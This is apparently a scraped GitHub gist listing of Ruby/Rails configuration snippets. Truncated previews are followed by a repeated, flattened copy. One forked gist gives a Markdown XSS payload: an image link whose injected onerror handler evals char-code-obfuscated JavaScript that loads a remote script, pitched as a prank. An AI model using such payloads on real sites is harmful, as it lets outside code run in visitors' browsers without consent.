Rafa García rgo

## Rakefile
# change foo to your library name
# change Foo::Database to your Sequel database

namespace :bundler do
  task :setup do
    require 'rubygems'
    require 'bundler/setup'
  end
end

## gist:2e90a1d6e76c78b8d518

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rgo
                / gist:2e90a1d6e76c78b8d518
            
            
              Last active
              August 29, 2015 14:08
                — forked from mediaupstream/gist:3857950
            
          
    Want to add Cornify (http://www.cornify.com/) to a website that has a Markdown XSS exploit?

![uh](http://example.com"onerror="javascript:eval\(String\.fromCharCode\(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,99,111,114,110,105,102,121,46,99,111,109,47,106,115,47,99,111,114,110,105,102,121,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,123,32,99,111,114,110,105,102,121,95,97,100,100,40,41,32,125,44,32,49,48,48,48,41,59\)\))

The above code does this:

var s=document.createElement('script'); s.src='http://www.cornify.com/js/cornify.js';document.getElementsByTagName('head')[0].append

  
## autobench_grapher.rb
# Used to graph results from autobench
#
# Usage: ruby autobench_grapher.rb result_from_autobench.tsv
#
# This will generate three svg & png graphs

require "rubygems"
require "scruffy"
require 'csv'
require 'yaml'

## hide_flash_messages_automagically.js
<%# From pretty_flash by rpheath (improved by pacoguzman) %>

<% if flash.any? -%>
  <script type="text/javascript">
    $(function() {
        setTimeout(hideFlashes, 5000);
    });

    var hideFlashes = function() {
      $("[id^='flash_']").fadeOut(1500);

## font faces
/* Font face generator needed to IE family
 * http://www.fontsquirrel.com/fontface/generator
 */

@font-face {
	font-family: 'Essays1743Italic';
	src: url('Essays1743-Italic.eot');
	src: local('☺'), url('Essays1743-Italic.ttf') format('truetype');
}

## Gemfile
# include at least one source and the rails gem
source :gemcutter
gem 'rails', '~> 2.3.5', :require => nil
gem 'sqlite3-ruby', :require => 'sqlite3'

# Devise 1.0.2 is not a valid gem plugin for Rails, so use git until 1.0.3
# gem 'devise', :git => 'git://github.com/plataformatec/devise.git', :ref => 'v1.0'

group :development do
  # bundler requires these gems in development

## .irbrc.rb
# IRBRC file by Iain Hecker, http://iain.nl
# put all this in your ~/.irbrc
require 'rubygems'
require 'yaml'

alias q exit

class Object
  def local_methods
    (methods - Object.instance_methods).sort

## gist:874844
/path/to/rails_apps/*/log/*.log {
  daily
  missingok
  rotate 30
  compress
  delaycompress
  sharedscripts
  postrotate
    find /path/to/rails_apps/* -name tmp -maxdepth 1 -type d -exec touch {}/restart.txt \;
  endscript

## gist:1173243
images = Dir.glob('public/images/*')

images.each do |image|
  unless File.directory?(image)
    puts "Checking #{image}..."
    if IO.popen("ack-grep -1 -G '(app|public)' --ruby --html --css #{File.basename(image)}").eof?
      IO.popen("svn delete #{image}")
      puts "  Deleted"
    end
  end

## sshd_config
# This prevents capistrano from hanging when executing long tasks
# /etc/ssh/sshd_config

TCPKeepAlive yes
ClientAliveInterval 15
ClientAliveCountMax 5

# Restart sshd
	# change foo to your library name
	# change Foo::Database to your Sequel database

	namespace :bundler do
	task :setup do
	require 'rubygems'
	require 'bundler/setup'
	end
	end
	# Used to graph results from autobench
	#
	# Usage: ruby autobench_grapher.rb result_from_autobench.tsv
	#
	# This will generate three svg & png graphs

	require "rubygems"
	require "scruffy"
	require 'csv'
	require 'yaml'
	<%# From pretty_flash by rpheath (improved by pacoguzman) %>

	<% if flash.any? -%>
	<script type="text/javascript">
	$(function() {
	setTimeout(hideFlashes, 5000);
	});

	var hideFlashes = function() {
	$("[id^='flash_']").fadeOut(1500);
	/* Font face generator needed to IE family
	* http://www.fontsquirrel.com/fontface/generator
	*/

	@font-face {
	font-family: 'Essays1743Italic';
	src: url('Essays1743-Italic.eot');
	src: local('☺'), url('Essays1743-Italic.ttf') format('truetype');
	}
	# include at least one source and the rails gem
	source :gemcutter
	gem 'rails', '~> 2.3.5', :require => nil
	gem 'sqlite3-ruby', :require => 'sqlite3'

	# Devise 1.0.2 is not a valid gem plugin for Rails, so use git until 1.0.3
	# gem 'devise', :git => 'git://github.com/plataformatec/devise.git', :ref => 'v1.0'

	group :development do
	# bundler requires these gems in development
	# IRBRC file by Iain Hecker, http://iain.nl
	# put all this in your ~/.irbrc
	require 'rubygems'
	require 'yaml'

	alias q exit

	class Object
	def local_methods
	(methods - Object.instance_methods).sort
	/path/to/rails_apps//log/.log {
	daily
	missingok
	rotate 30
	compress
	delaycompress
	sharedscripts
	postrotate
	find /path/to/rails_apps/* -name tmp -maxdepth 1 -type d -exec touch {}/restart.txt \;
	endscript
	images = Dir.glob('public/images/*')

	images.each do \|image\|
	unless File.directory?(image)
	puts "Checking #{image}..."
	if IO.popen("ack-grep -1 -G '(app\|public)' --ruby --html --css #{File.basename(image)}").eof?
	IO.popen("svn delete #{image}")
	puts " Deleted"
	end
	end
	# This prevents capistrano from hanging when executing long tasks
	# /etc/ssh/sshd_config

	TCPKeepAlive yes
	ClientAliveInterval 15
	ClientAliveCountMax 5

	# Restart sshd